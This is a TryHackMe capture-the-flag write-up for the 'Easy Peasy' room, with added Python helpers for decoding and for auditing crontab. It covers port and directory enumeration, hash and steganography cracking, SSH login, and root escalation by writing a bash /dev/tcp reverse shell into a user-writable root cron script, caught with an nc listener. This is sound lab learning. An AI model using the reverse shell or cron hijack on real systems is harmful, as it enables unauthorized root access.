Easy Peasy — TryHackMe WriteUp

Wilklins Nyatteng
Published in System Weakness · 8 min read · Aug 16, 2023


Greetings, avid learners!🌟 In this article we’re diving headfirst into the TryHackMe room Easy Peasy, where we’ll practise locating hidden directories with tools like Nmap and GoBuster. Let’s delve in! 🚀🔒

The room’s instructions read: ‘Practice using tools such as Nmap and GoBuster to locate a hidden directory to get initial access to a vulnerable machine. Then escalate your privileges through a vulnerable cronjob.’ So we deploy the machine attached to the task, enumerate it with Nmap, and then compromise it.

So I started with a full-port Nmap scan:

└─$ nmap --min-rate 1000 -p- 10.10.4.113
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-15 18:57 EAT
Nmap scan report for 10.10.4.113
Host is up (0.29s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT      STATE SERVICE
80/tcp    open  http
6498/tcp  open  unknown
65524/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 83.52 seconds

We find three open ports. I then ran a service and version scan against those ports:

└─$ nmap -p80,6498,65524 -sCV -A 10.10.4.113
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-15 19:02 EAT
Nmap scan report for 10.10.4.113
Host is up (0.30s latency).

PORT      STATE SERVICE VERSION
80/tcp    open  http    nginx 1.16.1
|_http-server-header: nginx/1.16.1
|_http-title: Welcome to nginx!
| http-robots.txt: 1 disallowed entry
|_/
6498/tcp  open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 30:4a:2b:22:ac:d9:56:09:f2:da:12:20:57:f4:6c:d4 (RSA)
|   256 bf:86:c9:c7:b7:ef:8c:8b:b9:94:ae:01:88:c0:85:4d (ECDSA)
|_  256 a1:72:ef:6c:81:29:13:ef:5a:6c:24:03:4c:fe:3d:0b (ED25519)
65524/tcp open  http    Apache httpd 2.4.43 ((Ubuntu))
|_http-server-header: Apache/2.4.43 (Ubuntu)
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Apache2 Debian Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.73 seconds

We start enumerating the ports, beginning with the web server on port 80. Viewing robots.txt gives us nothing useful.

I then ran GoBuster to brute-force directories and found /hidden:

└─$ gobuster dir -u http://10.10.4.113/ --wordlist=/usr/share/wordlists/dirb/big.txt 
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.4.113/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2023/08/15 19:08:34 Starting gobuster in directory enumeration mode
===============================================================
/hidden (Status: 301) [Size: 169] [--> http://10.10.4.113/hidden/]
/robots.txt (Status: 200) [Size: 43]
Progress: 20467 / 20470 (99.99%)
===============================================================
2023/08/15 19:19:05 Finished
===============================================================

Accessing the directory, I find an image.

I kept enumerating by viewing the page source, but there was nothing to work with. A further GoBuster run against /hidden found /hidden/whatever/:

└─$ gobuster dir -u http://10.10.4.113/hidden --wordlist=/usr/share/wordlists/dirb/big.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.4.113/hidden
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2023/08/15 19:30:14 Starting gobuster in directory enumeration mode
===============================================================
/whatever (Status: 301) [Size: 169] [--> http://10.10.4.113/hidden/whatever/]
Progress: 20469 / 20470 (100.00%)
===============================================================
2023/08/15 19:41:48 Finished
===============================================================

On accessing it, we find another image.

Viewing its page source, we find something interesting that looks like Base64.

So we decode it and get the first flag: flag{&&&}

We enumerate the machine further by checking the other open ports, starting with port 65524, which also runs Apache.

On checking /robots.txt we find a hash.

Identifying the hash type shows it is MD5. Cracking it gives flag{*$*$*$}

On checking the page source, there are flags in plain text:

Fl4g 3 : flag{*@*@*@@**3fc64cd312}

At the top of the page source there is a line with a hidden element: its encoded with ba……ObsJmP173N2%$%$%#%$%$

The string is Base62-encoded; decoding it gives a directory, /^%$&1ng^%&$m4^$3r

We access the directory.

So I download the image to my machine and check its information with Steghide, but it requires a passphrase:

└─$ steghide info binarycodepixabay.jpg
"binarycodepixabay.jpg":
format: jpeg
capacity: 4.6 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
steghide: could not extract any data with that passphrase!

I use StegCracker to recover the passphrase:

└─$ stegcracker binarycodepixabay.jpg easypeasy.txt                      
StegCracker 2.1.0 - (https://github.com/Paradoxis/StegCracker)
Copyright (c) 2023 - Luke Paris (Paradoxis)

StegCracker has been retired following the release of StegSeek, which
will blast through the rockyou.txt wordlist within 1.9 second as opposed
to StegCracker which takes ~5 hours.

StegSeek can be found at: https://github.com/RickdeJager/stegseek

Counting lines in wordlist..
Attacking file 'binarycodepixabay.jpg' with wordlist 'easypeasy.txt'..
Successfully cracked file with password: (&$^%$&*#*#($)
Tried 3585 passwords
Your file has been written to: binarycodepixabay.jpg.out

I use steghide to extract the contents of the image:

└─$ steghide --extract -sf binarycodepixabay.jpg

Enter passphrase:
wrote extracted data to "secrettext.txt".

We get a file ‘secrettext.txt’. On viewing it we get:

└─$ cat secrettext.txt                 
username:boring
password:
01101001 01100011 01101111 01101110 01110110 01100101 01110010 01110100 01100101 01100100 01101101 01111001 01110000 01100001 01110011 01110011 01110111 01101111 01110010 01100100 01110100 01101111 01100010 01101001 01101110 01100001 01110010 01111001

So we use dcode.fr to identify the encoding and decode it.

We get the password (redacted).

So we have the username boring from secrettext.txt and a password. On this machine SSH runs on port 6498, not the default port 22.

We log in to the machine with those details:

└─$ ssh boring@10.10.4.113 -p6498                                        
The authenticity of host '[10.10.4.113]:6498 ([10.10.4.113]:6498)' can't be established.
ED25519 key fingerprint is SHA256:6XHUSqR7Smm/Z9qPOQEMkXuhmxFm+McHTLbLqKoNL/Q.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.4.113]:6498' (ED25519) to the list of known hosts.
*************************************************************************
** This connection are monitored by government offical **
** Please disconnect if you are not authorized **
** A lawsuit will be filed against you if the law is not followed **
*************************************************************************
boring@10.10.4.113's password:
You Have 1 Minute Before AC-130 Starts Firing
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
!!!!!!!!!!!!!!!!!!I WARN YOU !!!!!!!!!!!!!!!!!!!!
You Have 1 Minute Before AC-130 Starts Firing
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
!!!!!!!!!!!!!!!!!!I WARN YOU !!!!!!!!!!!!!!!!!!!!

Looking around we find user.txt. We view its contents:

boring@kral4-PC:~$ ls
user.txt
boring@kral4-PC:~$ cat user.txt
User Flag But It Seems Wrong Like It`s Rotated Or Something
synt{redacted}
boring@kral4-PC:~$

There is a message above the user flag: it seems to be encrypted, and the hint mentions ‘rotated’.

On checking what type of cipher it is, we find it is a ROT cipher. Decrypting it gives our user flag flag{redacted}
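The flags in this room are recovered by recognising three encodings: Base64 in the page source, 8-bit binary for the SSH password in secrettext.txt, and a ROT shift on user.txt. The Python helper below is added here and is not part of the original write-up; it identifies which of those a string uses and decodes it, brute-forcing all 26 ROT shifts until the flag{ marker appears (function names and the sample strings in the comments are constructed).

```python
import base64
import re
import string

BINARY_RE = re.compile(r"^(?:[01]{8}\s*)+$")  # whitespace-separated 8-bit groups
BASE64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")

def decode_binary_octets(s):
    """Constructed sample: '01101000 01101001' -> 'hi'; each 8-bit group is one ASCII char."""
    return "".join(chr(int(octet, 2)) for octet in s.split())

def rot(s, n):
    """Shift letters by n places; digits and punctuation such as '{' and '}' are untouched."""
    out = []
    for ch in s:
        if ch in string.ascii_lowercase:
            out.append(chr((ord(ch) - 97 + n) % 26 + 97))
        elif ch in string.ascii_uppercase:
            out.append(chr((ord(ch) - 65 + n) % 26 + 65))
        else:
            out.append(ch)
    return "".join(out)

def crack_rot(s, marker="flag{"):
    """Try all 26 shifts; return (shift, plaintext) for the first one containing marker."""
    for n in range(26):
        candidate = rot(s, n)
        if marker in candidate:
            return n, candidate
    return None

def decode_any(s):
    """Return (encoding, decoded) for the encodings seen in this room, or ('unknown', s)."""
    s = s.strip()
    if BINARY_RE.match(s):
        return "binary", decode_binary_octets(s)
    if len(s) % 4 == 0 and BASE64_RE.match(s):
        try:
            text = base64.b64decode(s, validate=True).decode("ascii")
            if text.isprintable():
                return "base64", text
        except (ValueError, UnicodeDecodeError):
            pass  # Base64-looking alphabet but not real Base64 text; fall through
    cracked = crack_rot(s)
    if cracked:
        return f"rot{cracked[0]}", cracked[1]
    return "unknown", s
```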

We now look for ways to escalate privileges to root. I try sudo -l to see what we can run, but it is unsuccessful:

boring@kral4-PC:~$ sudo -l
[sudo] password for boring:
Sorry, user boring may not run sudo on kral4-PC.

I check the crontab file, as hinted by the room description:

boring@kral4-PC:~$ cat /etc/crontab 
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root cd /var/www/ && sudo bash .mysecretcronjob.sh

We find a bash script in /var/www that runs every minute as root via sudo. We go to that directory:

boring@kral4-PC:~$ cd /var/www/
boring@kral4-PC:/var/www$ ls -lah
total 16K
drwxr-xr-x 3 root root 4.0K Jun 15 2020 .
drwxr-xr-x 14 root root 4.0K Jun 13 2020 ..
drwxr-xr-x 4 root root 4.0K Jun 15 2020 html
-rwxr-xr-x 1 boring boring 33 Jun 14 2020 .mysecretcronjob.sh
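From a defender’s side, the weakness here is a root cron job whose script is owned by an unprivileged user. The Python audit below is added here and is not part of the original write-up: it parses /etc/crontab-style entries, resolves the script path behind a leading cd, and flags root jobs whose script is non-root-owned or group/world writable. The sample crontab and the file metadata are constructed and injected through the stat_fn parameter so the block runs offline; against a real host, call audit_crontab with the file contents and the default os.stat.

```python
import os
import re
import shlex
import stat
from types import SimpleNamespace

def parse_system_crontab(text):
    """Yield (user, command) from /etc/crontab-style lines: five time fields, user, command."""
    for line in text.splitlines():
        parts = line.split(None, 6)  # blank and VAR=value lines have fewer than 7 fields
        if len(parts) == 7 and not parts[0].startswith("#"):
            yield parts[5], parts[6]

def script_paths(command, cwd="/"):
    """Absolute paths of scripts a command runs, following a leading 'cd DIR &&'."""
    paths = []
    for segment in re.split(r"&&|\|\||;", command):
        words = shlex.split(segment)
        if words and words[0] == "cd" and len(words) > 1:
            cwd = os.path.normpath(os.path.join(cwd, words[1]))
            continue
        for w in words[1:]:  # skip the wrapper/interpreter word (sudo, bash, test, ...)
            if w.endswith(".sh") or w.startswith("/"):
                paths.append(os.path.normpath(os.path.join(cwd, w)))
    return paths

def audit_crontab(text, stat_fn=os.stat):
    """(path, uid, mode) for every root job whose script is non-root-owned or group/world writable."""
    findings = []
    for user, command in parse_system_crontab(text):
        if user != "root":
            continue
        for path in script_paths(command):
            try:
                st = stat_fn(path)
            except (OSError, KeyError):
                continue  # absent on this host (or from a fake table); nothing to assess
            if st.st_uid != 0 or st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append((path, st.st_uid, oct(st.st_mode & 0o777)))
    return findings

SAMPLE_CRONTAB = """# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
* * * * * root cd /var/www/ && sudo bash .mysecretcronjob.sh
"""
SAMPLE_FILES = {"/var/www/.mysecretcronjob.sh": SimpleNamespace(st_uid=1000, st_mode=stat.S_IFREG | 0o755)}

def demo_findings():
    """Constructed sample with faked file metadata: the root job runs a script owned by uid 1000."""
    return audit_crontab(SAMPLE_CRONTAB, stat_fn=SAMPLE_FILES.__getitem__)
```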

I used the Reverse Shell Cheat Sheet from Pentest Monkey.

The script is owned and writable by boring, so I edit it to add a reverse shell:

#!/bin/bash
# i will run as root
bash -i >& /dev/tcp/10.8.35.209/4444 0>&1

I then start a listener on my local machine:

└─$ nc -lvnp 4444                           
listening on [any] 4444 ...
connect to [10.8.35.209] from (UNKNOWN) [10.10.4.113] 46334
bash: cannot set terminal process group (1803): Inappropriate ioctl for device
bash: no job control in this shell
root@kral4-PC:/var/www#

It connects back as root immediately. I then go to root’s home directory to get the flag, which is flag{redacted}:

root@kral4-PC:/var/www# ls
ls
html
root@kral4-PC:/var/www# cd ~
cd ~
root@kral4-PC:~# ls
ls
root@kral4-PC:~# ls -al
ls -al
total 40
drwx------ 5 root root 4096 Jun 15 2020 .
drwxr-xr-x 23 root root 4096 Jun 15 2020 ..
-rw------- 1 root root 2 Aug 15 10:49 .bash_history
-rw-r--r-- 1 root root 3136 Jun 15 2020 .bashrc
drwx------ 2 root root 4096 Jun 13 2020 .cache
drwx------ 3 root root 4096 Jun 13 2020 .gnupg
drwxr-xr-x 3 root root 4096 Jun 13 2020 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 39 Jun 15 2020 .root.txt
-rw-r--r-- 1 root root 66 Jun 14 2020 .selected_editor
root@kral4-PC:~# cat .root.txt
cat .root.txt
flag{redacted}

About the author

Wilklins Nyatteng is a cyber security enthusiast with interests in penetration testing & vulnerability assessments, OSINT and cloud security. Certified Cyber Security Professional by Trend Micro, 9x Microsoft Certified, CEH Master and AWS Solutions Architect — Associate.

Follow me on:

Twitter, LinkedIn, Github
